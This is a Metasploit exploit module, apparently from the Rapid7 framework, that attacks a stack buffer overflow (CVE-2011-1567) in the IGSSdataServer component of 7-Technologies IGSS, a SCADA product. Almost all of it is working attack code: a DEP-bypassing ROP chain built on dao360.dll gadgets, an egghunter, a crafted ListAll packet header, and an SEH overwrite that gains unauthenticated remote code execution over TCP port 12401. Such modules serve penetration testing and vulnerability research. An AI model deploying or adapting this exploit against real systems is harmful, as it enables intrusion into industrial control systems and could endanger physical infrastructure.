modules/exploits/windows/scada/igss9_igssdataserver_listall.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::Egghunter
include Msf::Exploit::Remote::Tcp
def initialize(info={})
super(update_info(info,
'Name' => "7-Technologies IGSS IGSSdataServer.exe Stack Buffer Overflow",
'Description' => %q{
This module exploits a vulnerability in the igssdataserver.exe component of 7-Technologies
IGSS up to version 9.00.00 b11063. While processing a ListAll command, the application
fails to do proper bounds checking before copying data into a small buffer on the stack.
This causes a buffer overflow and allows to overwrite a structured exception handling record
on the stack, allowing for unauthenticated remote code execution. Also, after the payload
exits, IGSSdataServer.exe should automatically recover.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Luigi Auriemma', #Initial discovery, poc
'Lincoln', #Metasploit
'corelanc0d3r <peter.ve[at]corelan.be>', #Rop exploit, combined XP SP3 & 2003 Server
'sinn3r', #Serious Msf style policing
],
'References' =>
[
['CVE', '2011-1567'],
['OSVDB', '72353'],
['URL', 'http://aluigi.altervista.org/adv/igss_2-adv.txt'],
['URL', 'https://www.cisa.gov/uscert/ics/advisories/ICSA-11-132-01A']
],
'Payload' =>
{
'BadChars' => "\x00",
},
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Platform' => 'win',
'Targets' =>
[
[
'Windows XP SP3/2003 Server R2 SP2 (DEP Bypass)',
{
'Ret' => 0x1b77ca8c, #dao360.dll pivot 1388 bytes
'Offset' => 500
}
],
],
'Privileged' => false,
'DisclosureDate' => '2011-03-24',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(12401)
])
end
def junk
return rand_text(4).unpack("L")[0].to_i
end
def exploit
eggoptions =
{
:checksum => false,
:eggtag => 'w00t',
:depmethod => 'virtualprotect',
:depreg => 'esi'
}
badchars = "\x00"
hunter,egg = generate_egghunter(payload.encoded, badchars, eggoptions)
#dao360.dll - pvefindaddr rop 'n roll
rop_chain = [
0x1b7681c4, # rop nop
0x1b7681c4, # rop nop
0x1b7681c4, # rop nop
0x1b7681c4, # rop nop
0x1b7681c4, # rop nop
0x1b7681c4, # rop nop
0x1b7681c4, # rop nop
0x1b7681c4, # rop nop
0x1b7681c4, # rop nop
0x1b7681c4, # rop nop
0x1b72f174, # POP EAX # RETN 08
0xA1A10101,
0x1b7762a8, # ADD EAX,5E5F0000 # RETN 08
junk,
junk,
0x1b73a55c, # XCHG EAX,EBX # RETN
junk,
junk,
0x1b724004, # pop ebp
0x1b72f15f, # &push esp # retn 8
0x1b72f040, # POP ECX # RETN
0x1B78F010, # writeable
0x1b7681c2, # xor eax,eax # retn
0x1b72495c, # add al,40 # mov [esi+4],eax # pop esi # retn 4
0x41414141,
0x1b76a883, # XCHG EAX,ESI # RETN 00
junk,
0x1b7785c1, # XOR EDX,EDX # CMP EAX,54 # SETE DL # MOV EAX,EDX # ADD ESP,8 # RETN 0C
junk,
junk,
0x1b78535c, # ADD EDX,ESI # SUB EAX,EDX # MOV DWORD PTR DS:[ECX+F8],EAX # XOR EAX,EAX # POP ESI # RETN 10
junk,
junk,
junk,
junk,
0x1b7280b4, # POP EDI # XOR EAX,EAX # POP ESI # RETN
junk,
junk,
junk,
junk,
0x1b7681c4, # rop nop (edi)
0x90909090, # esi -> eax -> nop
0x1b72f174, # POP EAX # RETN 08
0xA1F50214, # offset to &VirtualProtect
0x1b7762a8, # ADD EAX,5E5F0000 # RETN 08
junk,
junk,
0x1b73f3bd, # MOV EAX,DWORD PTR DS:[EAX] # RETN
junk,
junk,
0x1b76a883, # XCHG EAX,ESI # RETN 00
0x1b72f040, # pop ecx
0x1B78F010, # writeable (ecx)
0x1b764716, # PUSHAD # RETN
].pack('V*')
header = "\x00\x04" #Size
header << "\x01\x00\x34\x12"
header << "\x0D" #Opcode
header << "\x00\x00\x00\x00\x00\x00\x00"
header << "\x01" #Flag
header << "\x00\x00\x00"
header << "\x01" #Command (ListAll)
header << "\x00\x00\x00"
header << rand_text(14)
sploit = rop_chain
sploit << "\x90" * 10
sploit << hunter
sploit << rand_text(target['Offset'] - (sploit.length))
sploit << [target.ret].pack('V')
sploit << egg
sploit << rand_text(2000)
connect
print_status("Sending request...")
sock.put(header + sploit)
handler
disconnect
end
end